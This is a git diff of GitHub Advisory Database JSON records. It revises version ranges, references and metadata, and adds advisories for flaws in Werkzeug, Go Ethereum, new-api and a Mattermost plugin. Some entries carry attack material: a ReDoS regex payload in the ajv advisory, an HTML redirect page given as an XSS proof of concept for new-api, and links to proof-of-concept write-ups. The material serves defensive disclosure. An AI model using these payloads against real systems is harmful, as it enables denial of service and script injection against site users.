diff --git a/advisories/github-reviewed/2019/07/GHSA-hf23-9pf7-388p/GHSA-hf23-9pf7-388p.json b/advisories/github-reviewed/2019/07/GHSA-hf23-9pf7-388p/GHSA-hf23-9pf7-388p.json index 9e1feca142119..6b1268c57db52 100644 --- a/advisories/github-reviewed/2019/07/GHSA-hf23-9pf7-388p/GHSA-hf23-9pf7-388p.json +++ b/advisories/github-reviewed/2019/07/GHSA-hf23-9pf7-388p/GHSA-hf23-9pf7-388p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hf23-9pf7-388p", - "modified": "2025-04-01T16:33:05Z", + "modified": "2026-02-24T15:32:32Z", "published": "2019-07-26T16:09:47Z", "aliases": [ "CVE-2019-10173" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.4.10" }, { "fixed": "1.4.11" @@ -33,9 +33,9 @@ ] } ], - "database_specific": { - "last_known_affected_version_range": "<= 1.4.10" - } + "versions": [ + "1.4.10" + ] } ], "references": [ diff --git a/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json b/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json index 1c32e88eef1cb..a20e6bc61de8e 100644 --- a/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json +++ b/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-5mg8-w23w-74h3", - "modified": "2023-08-18T15:56:36Z", + "modified": "2026-02-23T22:45:53Z", "published": "2021-03-25T17:04:19Z", "aliases": [ "CVE-2020-8908" ], "summary": "Information Disclosure in Guava", - "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.\n", + "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json index 6386bf81eb90a..fb54a9073e854 100644 --- a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json +++ b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8v38-pw62-9cw2", - "modified": "2025-12-20T03:15:43Z", + "modified": "2026-02-20T19:56:16Z", "published": "2022-02-18T00:00:33Z", "aliases": [ "CVE-2022-0639" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.5.7" diff --git a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json index 90fa858d67a89..efd0a189e3e1a 100644 --- a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json +++ b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rqff-837h-mm52", - "modified": "2022-02-24T14:00:06Z", + "modified": "2026-02-20T19:56:07Z", "published": "2022-02-15T00:02:46Z", "aliases": [ "CVE-2022-0512" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "0.1.0" }, { "fixed": "1.5.6" diff --git a/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json b/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json index eaad37ba99926..d4b0769563ba5 100644 --- a/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json +++ b/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gx7g-wjxg-jwwj", - "modified": "2022-04-18T22:17:42Z", + "modified": "2026-02-18T23:33:34Z", "published": "2022-04-04T00:00:55Z", "aliases": [ "CVE-2022-0088" @@ -52,6 +52,10 @@ "type": "WEB", "url": "https://github.com/yourls/yourls/commit/1de256d8694b0ec7d4df2ac1d5976d4055e09d59" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-0088.md" + }, { "type": "PACKAGE", "url": "https://github.com/yourls/yourls" diff --git a/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json b/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json index d452d221466e0..2950526f06122 100644 --- a/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json +++ b/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mg5h-rhjq-6v84", - "modified": "2022-11-01T20:35:47Z", + "modified": "2026-02-18T23:33:51Z", "published": "2022-10-31T12:00:18Z", "aliases": [ "CVE-2022-3766" @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/thorsten/phpmyfaq/commit/c7904f2236c6c0dd64c2226b90c30af0f7e5a72d" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-3766.md" + }, { "type": "PACKAGE", "url": "https://github.com/thorsten/phpmyfaq" diff --git a/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json b/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json index 3becc89af6f0e..38c97bebed5e5 100644 --- a/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json +++ b/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cp9c-phxx-55xm", - "modified": "2022-12-12T22:08:01Z", + "modified": "2026-02-18T23:34:01Z", "published": "2022-12-11T15:30:45Z", "aliases": [ "CVE-2022-4407" @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/thorsten/phpmyfaq/commit/1d73af34bf42764f9f9491c7ba5e9495d70e3ca5" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-4407.md" + }, { "type": "PACKAGE", "url": "https://github.com/thorsten/phpmyfaq" diff --git a/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json b/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json index 29d2d42046096..6575c789053ec 100644 --- a/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json +++ b/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-5pxr-7m4j-jjc6", - "modified": "2025-03-19T14:49:46Z", + "modified": "2026-02-18T23:46:36Z", "published": "2024-06-07T19:37:10Z", "aliases": [ "CVE-2024-37160" ], "summary": "Cross-site scripting (XSS) vulnerability in Description metadata", - "details": "### Summary\nRegardless of the role or privileges, no user should be able to inject malicious JavaScript (JS) scripts into the body HTML. an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website. Once the JS script is embedded in the body HTML, the XSS will trigger on any page a victim visits, such as the about, blog, contact, or any other pages, except for the panel.\n\n### Impact\nThis vulnerability allows attackers to inject malicious JS or HTML through a crafted payload into the vulnerable spot, achieving persistence and attacking numerous visitors or anyone accessing the website. The attack can be widespread and affect many users because the malicious JS will execute on every page, unlike an injection on a specific page (e.g., injecting on the About page would only affect that page). In this case, a single injection point leads to the execution of the malicious JS on all pages.\n\n### Patches\n- [**Formwork 1.13.1**](https://github.com/getformwork/formwork/releases/tag/1.13.1) has been released with a patch that solves this vulnerability by escaping all metadata attributes.\n- [**Formwork 2.x** (f531201)](https://github.com/getformwork/formwork/commit/f5312015a5a5e89b95ef2bd07e496f8474d579c5) also escapes metadata attributes.\n\n### Details\nAn attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site. This type of attack is suitable for persistence, affecting visitors across all pages (except the dashboard).\n\n### PoC\n1. Log in with an Administrator user account.\n2. Navigate to /panel/options/site/.\n3. Inject the JS script by adding to the description field.\n4. Simulate a victim who is not a site member visiting the website. You will notice that the JS script executes on every page they vis\n\n![image](https://github.com/getformwork/formwork/assets/170840940/1c40be24-3367-4c80-bb44-9db64ef88970)\n![image](https://github.com/getformwork/formwork/assets/170840940/68dd5bff-9db1-441b-a3b3-a0c014565f59)\n![image](https://github.com/getformwork/formwork/assets/170840940/3cd84c39-9b44-49d0-8b6a-6c8aeda7e49f)\n![image](https://github.com/getformwork/formwork/assets/170840940/f45afd87-80e9-4cf1-8121-bb4e121849c9)", + "details": "### Summary\nRegardless of the role or privileges, no user should be able to inject malicious JavaScript (JS) scripts into the body HTML. an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website. Once the JS script is embedded in the body HTML, the XSS will trigger on any page a victim visits, such as the about, blog, contact, or any other pages, except for the panel.\n\n### Impact\nThis vulnerability allows attackers to inject malicious JS or HTML through a crafted payload into the vulnerable spot, achieving persistence and attacking numerous visitors or anyone accessing the website. The attack can be widespread and affect many users because the malicious JS will execute on every page, unlike an injection on a specific page (e.g., injecting on the About page would only affect that page). In this case, a single injection point leads to the execution of the malicious JS on all pages.\n\n### Patches\n- [**Formwork 1.13.1**](https://github.com/getformwork/formwork/releases/tag/1.13.1) has been released with a patch that solves this vulnerability by escaping all metadata attributes.\n- [**Formwork 2.x** (f531201)](https://github.com/getformwork/formwork/commit/f5312015a5a5e89b95ef2bd07e496f8474d579c5) also escapes metadata attributes.\n\n### Details\nAn attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site. This type of attack is suitable for persistence, affecting visitors across all pages (except the dashboard).", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2025/03/GHSA-c85w-x26q-ch87/GHSA-c85w-x26q-ch87.json b/advisories/github-reviewed/2025/03/GHSA-c85w-x26q-ch87/GHSA-c85w-x26q-ch87.json index 371cefeb3b7a5..6695e555043bd 100644 --- a/advisories/github-reviewed/2025/03/GHSA-c85w-x26q-ch87/GHSA-c85w-x26q-ch87.json +++ b/advisories/github-reviewed/2025/03/GHSA-c85w-x26q-ch87/GHSA-c85w-x26q-ch87.json @@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-c85w-x26q-ch87", - "modified": "2025-03-16T17:19:23Z", + "modified": "2026-02-18T23:47:37Z", "published": "2025-03-01T00:11:52Z", "aliases": [], "summary": "Formwork improperly validates input of User role preventing site and panel availability", - "details": "### Summary\n\nImproper validation of select fields allows attackers to craft an input that crashes the system, resulting in a 500 status and making the entire site and administration panel unavailable.\nThis clearly impacts the Availability aspect of the CIA triad (confidentiality, integrity, and availability), although the attack still has certain limitations.\n\n### Details\n\nThe attack involves injecting any invalid user role value (e.g. \">\") into the Role=User parameter in the /panel/users/{name}/profile page, which is the user profile update page.\nDoing this will change the users data in a way that prevents users and then the entire site from loading. Even though the actual data change is minimal, the error is unrecoverable until a valid role parameter is restored by direct modification of the user account file.\nProper validation of select fields will prevent extraneous valid from being accepted and making the entire site and administration panel unavailable.\n\n### Patches\n- [**Formwork 2.x** (d9f0c1f)](https://github.com/getformwork/formwork/commit/d9f0c1feb3b9855d5bdc8bb189c0aaab2792e7ca) adds proper validation to select fields.\n\n### Impact\n\nThe condition for this attack is having high privileges or Admin access, which means it could be exploited by an Insider Threat. Alternatively, if an attacker gains access to a privileged user account, they can execute the attack as well.\nOverall, the attack is relatively difficult to carry out, but if successful, the impact and damage would be significant.\n\n### PoC\n\n![2025-02-27_10-25](https://github.com/user-attachments/assets/4b5a2d71-3397-4a5b-8464-35752376115a)\n\n1. Intercept the request and inject an input that will trigger an error.\n\n![2025-02-27_10-25_1](https://github.com/user-attachments/assets/a888c109-a724-4478-ae80-d9e8b05ef1aa)\n\n![image](https://github.com/user-attachments/assets/e81bb9fc-8c92-413c-8cc0-0bcffd2e2922)\n\n2.After that, it will be observed that the system is shut down or completely broken. Even changing the browser or resetting the server will not be able to restore it.", + "details": "### Summary\nImproper validation of select fields allows attackers to craft an input that crashes the system, resulting in a 500 status and making the entire site and administration panel unavailable.\nThis clearly impacts the Availability aspect of the CIA triad (confidentiality, integrity, and availability), although the attack still has certain limitations.\n\n### Details\nThe attack involves injecting any invalid user role value. Doing this will change the users data in a way that prevents users and then the entire site from loading. Even though the actual data change is minimal, the error is unrecoverable until a valid role parameter is restored by direct modification of the user account file.\nProper validation of select fields will prevent extraneous valid from being accepted and making the entire site and administration panel unavailable.\n\n### Patches\n- [**Formwork 2.x** (d9f0c1f)](https://github.com/getformwork/formwork/commit/d9f0c1feb3b9855d5bdc8bb189c0aaab2792e7ca) adds proper validation to select fields.\n\n### Impact\nThe condition for this attack is having high privileges or Admin access, which means it could be exploited by an Insider Threat. Alternatively, if an attacker gains access to a privileged user account, they can execute the attack as well.\nOverall, the attack is relatively difficult to carry out, but if successful, the impact and damage would be significant.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2025/03/GHSA-j3wr-m6xh-64hg/GHSA-j3wr-m6xh-64hg.json b/advisories/github-reviewed/2025/03/GHSA-j3wr-m6xh-64hg/GHSA-j3wr-m6xh-64hg.json index 009aeb62784e7..16445bbc9a8ed 100644 --- a/advisories/github-reviewed/2025/03/GHSA-j3wr-m6xh-64hg/GHSA-j3wr-m6xh-64hg.json +++ b/advisories/github-reviewed/2025/03/GHSA-j3wr-m6xh-64hg/GHSA-j3wr-m6xh-64hg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j3wr-m6xh-64hg", - "modified": "2025-03-21T17:40:52Z", + "modified": "2026-02-24T16:08:07Z", "published": "2025-03-20T12:32:43Z", "aliases": [ "CVE-2024-12704" @@ -18,7 +18,7 @@ { "package": { "ecosystem": "PyPI", - "name": "llama_index" + "name": "llama-index-core" }, "ranges": [ { diff --git a/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json b/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json index b09f8f6bf94da..e0a593b17c8f7 100644 --- a/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json +++ b/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json @@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-vf6x-59hh-332f", - "modified": "2025-03-17T20:27:03Z", + "modified": "2026-02-18T23:47:22Z", "published": "2025-03-01T00:11:46Z", "aliases": [], "summary": " Formwork has a cross-site scripting (XSS) vulnerability in Site title", - "details": "### Summary\n\nThe site title field at /panel/options/site/allows embedding JS tags, which can be used to attack all members of the system. This is a widespread attack and can cause significant damage if there is a considerable number of users.\n\n### Impact\n\nThe attack is widespread, leveraging what XSS can do. This will undoubtedly impact system availability.\n\n### Patches\n- [**Formwork 2.x** (aa3e9c6)](https://github.com/getformwork/formwork/commit/aa3e9c684035d9e8495169fde7c57d97faa3f9a2) escapes site title from panel header navigation.\n\n### Details\n\nBy embedding \"\n \n\n \n\n\n\n
\n \n
\n \n \n

正在为您跳转

\n

我们正在将您引导至 Google。
如果页面没有自动刷新,请点击下方的按钮。

\n \n \n 立即前往 Google\n
\n\n \n\n\n\n```\n\n### Acknowledgments\n\nQuantumNous would like to thank **TechnologyStar** for the early notification of this potential vulnerability via AI-assisted tools, and **small-lovely-cat** for providing additional context and an initial patch. The final fix was developed and verified by the maintainers to ensure full compatibility with the project's architecture.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/QuantumNous/new-api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.10.8-alpha.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-299v-8pq9-5gjq" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25802" + }, + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/commit/ab5456eb1049aa8a0f3e51f359907ec7fff38b4b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/QuantumNous/new-api" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:10:25Z", + "nvd_published_at": "2026-02-24T01:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json b/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json new file mode 100644 index 0000000000000..1d6629b5fd33b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-29vq-49wr-vm6x", + "modified": "2026-02-23T22:27:37Z", + "published": "2026-02-19T20:32:45Z", + "aliases": [ + "CVE-2026-27199" + ], + "summary": " Werkzeug safe_join() allows Windows special device names", + "details": "Werkzeug's `safe_join` function allows Windows device names as filenames if when preceded by other path segments.\n\nThis was previously reported as https://github.com/pallets/werkzeug/security/advisories/GHSA-hgf8-39gv-g3f2, but the added filtering failed to account for the fact that `safe_join` accepts paths with multiple segments, such as `example/NUL`.\n\n`send_from_directory` uses `safe_join` to safely serve files at user-specified paths under a directory. If the application is running on Windows, and the requested path ends with a special device name, the file will be opened successfully, but reading will hang indefinitely.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "werkzeug" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.1.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-29vq-49wr-vm6x" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27199" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/werkzeug/commit/f407712fdc60a09c2b3f4fe7db557703e5d9338d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pallets/werkzeug" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/werkzeug/releases/tag/3.1.6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-67" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:32:45Z", + "nvd_published_at": "2026-02-21T06:17:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json b/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json index 65d0ef6cccbb6..8bd8089cfb6b0 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json +++ b/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2c6v-8r3v-gh6p", - "modified": "2026-02-17T18:43:01Z", + "modified": "2026-02-19T21:14:56Z", "published": "2026-02-17T18:43:00Z", "aliases": [ "CVE-2026-25232" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/gogs/gogs/security/advisories/GHSA-2c6v-8r3v-gh6p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25232" + }, { "type": "WEB", "url": "https://github.com/gogs/gogs/pull/8124" @@ -64,6 +68,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T18:43:00Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T07:17:45Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json index de94b1ac5c5f9..d88bb33cb349a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json +++ b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-2g4f-4pwh-qvx6", - "modified": "2026-02-17T18:10:29Z", + "modified": "2026-02-23T22:40:29Z", "published": "2026-02-11T21:30:39Z", "aliases": [ "CVE-2025-69873" ], - "summary": "ajv has ReDoS when using $data option", + "summary": "ajv has ReDoS when using `$data` option", "details": "ajv (Another JSON Schema Validator) through version 8.17.1 is vulnerable to Regular Expression Denial of Service (ReDoS) when the `$data` option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax (`$data` reference), which is passed directly to the JavaScript `RegExp()` constructor without validation. An attacker can inject a malicious regex pattern (e.g., `\\\"^(a|a)*$\\\"`) combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with `$data`: true for dynamic schema validation.", "severity": [ { @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "7.0.0-alpha.0" }, { "fixed": "8.18.0" @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ajv" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.14.0" + } + ] + } + ] } ], "references": [ @@ -44,6 +63,10 @@ "type": "WEB", "url": "https://github.com/ajv-validator/ajv/pull/2586" }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/pull/2588" + }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/commit/720a23fa453ffae8340e92c9b0fe886c54cfe0d5" @@ -52,10 +75,18 @@ "type": "WEB", "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md" }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-2g4f-4pwh-qvx6" + }, { "type": "PACKAGE", "url": "https://github.com/ajv-validator/ajv" }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/releases/tag/v6.14.0" + }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/releases/tag/v8.18.0" @@ -63,6 +94,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-1333", "CWE-400" ], "severity": "MODERATE", diff --git a/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json b/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json new file mode 100644 index 0000000000000..8bb5175975be1 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2gjw-fg97-vg3r", + "modified": "2026-02-20T16:46:27Z", + "published": "2026-02-18T22:35:15Z", + "aliases": [ + "CVE-2026-26314" + ], + "summary": "Go Ethereum affected by DoS via malicious p2p message", + "details": "### Impact\n\nA vulnerable node can be forced to shutdown/crash using a specially crafted message.\nMore details to be released later.\n\n### Patches\n\nThe problem is resolved in the v1.16.9 and v1.17.0 releases of Geth.\n\n### Credit\n\nThis issue was reported to the Ethereum Foundation Bug Bounty Program by Waleed Ahmed from vulsight.com", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/ethereum/go-ethereum" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.16.9" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.16.8" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ethereum/go-ethereum/security/advisories/GHSA-2gjw-fg97-vg3r" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26314" + }, + { + "type": "WEB", + "url": "https://github.com/ethereum/go-ethereum/commit/895a8597cb16c02203e38707ed2d1da5c500fe60" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ethereum/go-ethereum" + }, + { + "type": "WEB", + "url": "https://github.com/ethereum/go-ethereum/releases/tag/v1.16.9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:35:15Z", + "nvd_published_at": "2026-02-19T22:16:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json b/advisories/github-reviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json similarity index 53% rename from advisories/unreviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json rename to advisories/github-reviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json index 0521f010c1e96..fa79c68079351 100644 --- a/advisories/unreviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json +++ b/advisories/github-reviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-2phx-frhf-xr55", - "modified": "2026-02-16T12:30:24Z", + "modified": "2026-02-19T19:34:32Z", "published": "2026-02-16T12:30:24Z", "aliases": [ "CVE-2026-0997" ], + "summary": "Mattermost Plugin Zoom allows any logged-in user to change Zoom meeting restrictions for arbitrary channels", "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 and Mattermost Plugin Zoom versions <=1.11.0 fail to validate the authenticated user when processing {{/plugins/zoom/api/v1/channel-preference}}, which allows any logged-in user to change Zoom meeting restrictions for arbitrary channels via crafted API requests.. Mattermost Advisory ID: MMSA-2025-00558", "severity": [ { @@ -13,12 +14,40 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-plugin-zoom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.11.0" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0997" }, + { + "type": "WEB", + "url": "https://github.com/mattermost/mattermost-plugin-zoom/commit/a8b58c43625ab25746e451acc4f71515d52c8122" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mattermost/mattermost-plugin-zoom" + }, { "type": "WEB", "url": "https://mattermost.com/security-updates" @@ -29,8 +58,8 @@ "CWE-863" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T19:34:32Z", "nvd_published_at": "2026-02-16T10:16:07Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json 